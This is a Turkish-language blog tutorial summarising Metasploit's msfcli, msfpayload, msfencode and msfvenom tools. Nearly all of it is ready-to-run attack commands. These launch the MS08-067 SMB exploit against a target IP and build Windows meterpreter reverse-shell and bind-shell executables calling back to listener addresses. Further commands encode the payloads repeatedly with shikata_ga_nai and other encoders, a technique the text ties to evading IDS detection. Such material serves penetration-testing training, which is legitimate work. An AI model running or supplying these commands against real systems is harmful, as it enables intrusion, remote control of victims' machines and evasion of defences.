Metasploit Detay Bilgiler (Özet)
Bu makalede metasploit hakkında bir önceki makalede paylaşılmış bilgilerin özeti yer almaktadır. Bu makalenin ilintili olduğu konu zinciri aşağıda verilmiştir:

[*]Bu belgede bahsedilecek komutlar Kali 1.0.4 ve Kali 2018.1’ de test edilmiştir ve sorunsuz çalıştırılmışlardır.



Aşağıda msfcli, msfpayload, msfencode ve msfvenom'un kullanımı verilmiştir.

a. Msfcli

Kullanım Dizilişi (Syntax’ı) 

msfcli  [Exploitadi]  [Option=value]  [Mode]

msfcli komutun adı, exploitadi kısmına msfconsole'da girdiğiniz exploit yolu ve ismi, option=value kısmına seçilen modülün parametre ve değerleri, son olarak da mode kısmına bu girilecek komut için uygulanacak nihai aksiyon gelir. 

Msfcli Modlar

Mod                     Yaptığı İş
-------------           -------------------
(H)elp                  Yardım menüsünün görüntülenmesini sağlar.
(S)ummary               Belirtilen exploit hakkında detaylı bilgi 
                        verir (Msfconsole'daki info'dur).
(O)ptions               Belirtilen exploit'in set edilecek 
                        değişkenlerini sunar. (Msfconsole'daki show 
                        options) 
(A)dvanced              Berlitilen exploit için ilgili tüm değişkenleri 
                        sunar. (Msfconsole'daki show advanced)
(I)DS Evasion           IDS'lere yakalanmamak için ayarlanabilecek 
                        değişkenleri sunar.
(P)ayloads              Belirtilen exploit'le uyumlu tüm payload'ları 
                        sunar.
(T)argets               Berlitilen exploit'in işe yaradığı işletim 
                        sistemlerini sunar.
(AC)tions               Berlirtilen exploit ile kullanılabilecek 
                        auxiliary'leri sunar.
(C)heck                 Belirtilen exploit'in hedef sistemde işe 
                        yarayıp yaramayacağını tespit eder.
(E)xecute               Belirtilen exploit'i çalıştırır.

Kullanımı 

# Seçilen modül için show (o)ptions yapılır
msfcli exploit/windows/smb/ms08_067_netapi RHOST=X.X.X.X RPORT=445 
PAYLOAD=windows/meterpreter/bind_tcp LHOST=Y.Y.Y.Y O   // (O)ptions



# Seçilen modül çalıştırılır.
msfcli exploit/windows/smb/ms08_067_netapi RHOST=X.X.X.X RPORT=445 
PAYLOAD=windows/meterpreter/bind_tcp LHOST=Y.Y.Y.Y E   // (E)xecute


Msfcli Hk.

Artık msfconsole tool’u ile de tek satırda bu işlemler yapılabilmektedir. msfconsole’a -x parametresi ile eklenecek msfconsole komutları (örn; use, set, exploit gibi…) tek satır halinde girilebilir ve sonuca ulaşabiliriz. 

# Seçilen modül için show (o)ptions yapılır.
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 
192.168.3.120; set RPORT 445; set PAYLOAD windows/meterpreter/bind_tcp;
set LHOST 192.168.3.73; show options"



# Seçilen modül çalıştırılır.
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 
192.168.3.120; set RPORT 445; set PAYLOAD windows/meterpreter/bind_tcp; 
set LHOST 192.168.3.73; exploit"


Uyarı

Msfcli tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfcli" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfcli ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerde bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018 

cd /usr/share/framework2/
./msfcli -h


b. Msfpayload

Kullanım Dizilişi (Syntax’ı) 

msfpayload  [Options]  [Payload]   [Parametre=arguman]  [CiktiFormati]


msfpayload komutun adı, options msfpayload’un tool parametre ve argumanlarını (örn; -h (yani help), -l (yani payload’ları listelemeye yarayan list) gibi), payload payload'un ismini, parametre=arguman seçilen payload'un parametre ve atanacak değerlerini, ciktiFormati ise payload'un hangi dilde wrap edilerek (etraflıca sarılarak) çıktılanacağını belirtir.

Msfpayload Çıktı Formatları 

Çıktı Format                    Msfpayload'a Konulacak Harfi
--------------------        ----------------------------
[O]ptions                   O
[C] Dili                    C
Cs[H]arp Dili               H
[P]erl Dili                 P
Ruby[Y] Dili                Y
[R]aw (Ham) Hal             R
[J]avascript Dili           J
e[X]e Hali                  X
[D]ll Hali                  D
[V]isual Basic Dili         V
[W]ar Hali                  W
Pytho[N] Dili               N

Kullanımı 

# Metasploit payload’ları sıralanır.
msfpayload -l



# Seçilen modülün seçenekleri sıralanır.
msfpayload windows/shell_bind_tcp O         // (O)ptions



# Seçilen payload’un seçeneklerine verilen değerler nedeniyle 
# seçenekler teyit amaçlı tekrar sıralanır. 
msfpayload windows/shell_bind_tcp  EXITFUNC=thread LPORT=1234
RHOST=222.168.33.41 O               // (O)ptions



# Seçilen payload modülü çıktılanır.
msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1234 
RHOST=222.168.33.41 X > payload.exe         //  e[X]e çıktı formatıdır.


Uyarı

Msfpayload tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfpayload" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfpayload ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerden bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018 

cd /usr/share/framework2/
./msfpayload -h


c. Msfencode

Kullanım Dizilişi (Syntax'ı) : 

msfencode  [Options]


msfencode komutun adı, options msfencode'un tool parametre ve değerlerini alır.

Msfencode Seçenekleri 

-e  : encoding ismi
-t  : çıktı formatı
-o  : çıktı dosyası ismi
-c  : count (iterasyon) sayısı

Kullanımı 

# Encoding tekniklerini sıralar.
msfencode -l



# Çıktılanan payload encode’lanır.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -t exe -o /root/Desktop/payload.exe



# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem I]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R  | msfencode -e x86/shikata_ga_nai -t raw | msfencode -e 
x86/shikata_ga_nai -t raw | msfencode -e x86/shikata_ga_nai -t raw | 
msfencode -e x86/shikata_ga_nai -t exe -o payload.exe



# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem II]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe



# Çıktılanan payload farklı farklı encoding teknikleriyle encode’lanır.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -t raw | msfencode -e 
x86/alpha_upper -t raw | msfencode -e x86/shikata_ga_nai -t raw | 
msfencode -e x86/countdown -t exe -o payload.exe



# Çıktılanan payload farklı farklı encoding teknikleriyle her biri 
# için birden fazla kez encode’lamaya tabi tutulur.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e 
x86/alpha_upper -c 3 -t raw |   msfencode -e x86/shikata_ga_nai -c 4 -t
raw | msfencode -e x86/countdown -c 2 -t exe -o payload.exe


Uyarı

Msfencode tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfencode" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfencode ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerden bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018 

cd /usr/share/framework2/
./msfencode -h


d. Msfvenom

Kullanım Dizilişi (Syntax’ı) 

msfvenom  [Options]  [Parametre=arguman]   [CiktiFormati]


msfvenom komutun adı, options msfvenom’un tool parametrelerini, parametre=arguman seçilen modülün parametreleri ve değerlerini, ciktiFormati ise payload’un son halinin hangi formatta olacağı bilgisini alır.

Kullanımı 

# Metasploit Framework payload’larını, encoder’larını ve 
# NOP’larını sıralar.
msfvenom -l



# Metasploit Framework payload’larını sıralar.
msfvenom -l payloads



# Metasploit Framework encoder’larını sıralar.
msfvenom -l encoders



# Metasploit Framework NOP’larını sıralar.
msfvenom -l nops


i) Msfvenom ile Payload Oluşturma 

# Seçilen payload’un seçenekleri sıralanır.
msfvenom -p windows/shell_bind_tcp --payload-options


(( Not: Eski kali’lerde --payload-options yerine -o kullanılmaktadır.))
(( Örn; msfvenom -p windows/shell_bind_tcp -o )) 

# Seçilen payload’un seçeneklerine verilen değerler nedeniyle 
# seçenekler teyit amaçlı tekrar sıralanır. [Not: Atanan değerleri
# gösterme özelliği henüz desteklenmemektedir]
msfvenom -p windows/shell_bind_tcp  EXITFUNC=thread LPORT=1234 
RHOST=222.168.33.41 --payload-options


(( not: Eski kali’lerde --payload-options yerine -o kullanılmaktadır.))
(( Örn; msfvenom -p windows/shell_bind_tcp -o )) 

# Seçilen payload’un çıktısı alınır.
msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 
RHOST=222.168.33.41 -f exe -o payload.exe


ii) Msfvenom ile Encode’lama 

# Çıktılanan payload encode’lanır.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe -o
payload.exe



# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem I]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe -o 
payload.exe



# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem II]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 4 -f exe 
-o payload.exe



# Çıktılanan payload farklı farklı encoding teknikleriyle 
# encode’lanır.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/countdown -f exe | msfvenom 
-a x86 --platform windows -e x86/shikata_ga_nai -f exe | msfvenom -a 
x86 --platform windows -e cmd/echo -f exe -o payload.exe



# Çıktılanan payload farklı farklı encoding teknikleriyle 
# her biri için birden fazla kez encode’lamaya tabi tutulur.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 4 -f exe
| msfvenom -a x86 --platform windows -e x86/countdown -i 2 -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe | 
msfvenom -a x86 --platform windows -e cmd/echo -i 3 -f exe -o 
payload.exe


Bu özet niteliğindeki makaleyle metasploit konu zinciri tamamlanmış bulunmaktadır. Aklınıza takılan, uğraşıp da yapamadığınız soruları burada yorum olarak paylaşabilirsiniz. İyi çalışmalar.
Bu yazı 16.11.2018 tarihinde, saat 09:47:53'de yazılmıştır. 30.08.2024 tarihi ve 21:10:51 saatinde ise güncellenmiştir.
Yazar : Hasan Fatih ŞİMŞEK Görüntülenme Sayısı : 2720
Yorumlar
Henüz yorum girilmemiştir.
Yorum Ekle
*
* (E-posta adresiniz yayınlanmayacaktır.)
*
*

#Arşiv

#Giriş
ID :
Şifre :